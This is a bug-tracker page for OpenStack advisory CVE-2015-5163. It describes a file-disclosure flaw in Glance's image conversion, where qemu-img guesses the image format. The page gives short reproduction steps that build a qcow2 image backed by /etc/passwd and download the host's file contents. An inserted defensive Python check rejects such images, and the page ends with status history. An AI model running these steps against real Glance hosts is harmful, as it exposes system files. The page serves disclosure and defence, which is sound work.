[OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
Glance | Fix Released | Critical | Flavio Percoco | |
Kilo | Fix Released | Undecided | Unassigned | |
OpenStack Security Advisory | Fix Released | Critical | Tristan Cacqueray | |
Bug Description
This is a security flaw that allows files from the Glance host to be obtained by a user.
I'm using the Glance file store and have set in /etc/glance/
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/
$ glance --os-image-
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file://
Similar to Cinder bug 1415087.
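A defensive pre-conversion check for the format-guessing problem described above, as an added example that is not part of the original report and is not the Glance fix. It parses the leading qcow2 header fields (magic, version, backing file offset and size) and refuses any image whose content is qcow2 but declared otherwise, or that names a backing file; the function names and the constructed sample headers are hypothetical.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
# Leading qcow2 header fields, big-endian:
# magic (4), version (4), backing_file_offset (8), backing_file_size (4)
_HEADER = struct.Struct(">4sIQI")


class UnsafeImage(Exception):
    """Raised when an image must not be handed to the converter."""


def inspect_header(data):
    """Return (is_qcow2, backing_file_name_or_None) from an image's first bytes."""
    if len(data) < _HEADER.size or data[:4] != QCOW2_MAGIC:
        return False, None
    _magic, _version, offset, size = _HEADER.unpack_from(data)
    if offset == 0:
        return True, None
    # A non-zero offset means a backing file is referenced, even if the
    # name itself lies beyond the bytes we were given.
    return True, data[offset:offset + size].decode("utf-8", "replace")


def check_before_convert(data, declared_format):
    """Return the source format to pass explicitly to the converter, or raise."""
    is_qcow2, backing = inspect_header(data)
    if is_qcow2 and declared_format != "qcow2":
        raise UnsafeImage("declared %s but content is qcow2" % declared_format)
    if backing is not None:
        raise UnsafeImage("image references backing file %r" % backing)
    return declared_format


def build_qcow2_header(backing=b""):
    """Constructed sample: a bare qcow2 header prefix, not a usable image."""
    offset = 104 if backing else 0  # assumption: name stored right after the header
    header = _HEADER.pack(QCOW2_MAGIC, 3, offset, len(backing))
    return header.ljust(104, b"\0") + backing


if __name__ == "__main__":
    samples = [(build_qcow2_header(), "qcow2"),
               (build_qcow2_header(b"/etc/passwd"), "qcow2"),
               (build_qcow2_header(), "raw")]
    for blob, declared in samples:
        try:
            print(declared, "-> convert with explicit format", check_before_convert(blob, declared))
        except UnsafeImage as exc:
            print(declared, "-> rejected:", exc)
```

The returned format is meant to be given to the converter as the explicit source format (`qemu-img convert -f <format>`), so that no auto-detection takes place.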
CVE References
Changed in ossa: | |
status: | Incomplete → Confirmed |
importance: | Undecided → Critical |
summary: |
- Format-guessing and file disclosure via image conversion
+ Format-guessing and file disclosure via image conversion (CVE-2015-5163) |
Changed in ossa: | |
status: | Confirmed → Fix Committed |
information type: | Private Security → Public Security |
summary: |
- Format-guessing and file disclosure via image conversion (CVE-2015-5163)
+ [OSSA 2015-014] Format-guessing and file disclosure via image conversion
+ (CVE-2015-5163) |
description: | updated |
Changed in ossa: | |
status: | Fix Committed → Fix Released |
Changed in glance: | |
status: | Fix Committed → Fix Released |
Changed in glance: | |
milestone: | liberty-3 → 11.0.0 |
Oops... clearly meant to report this to the Glance project.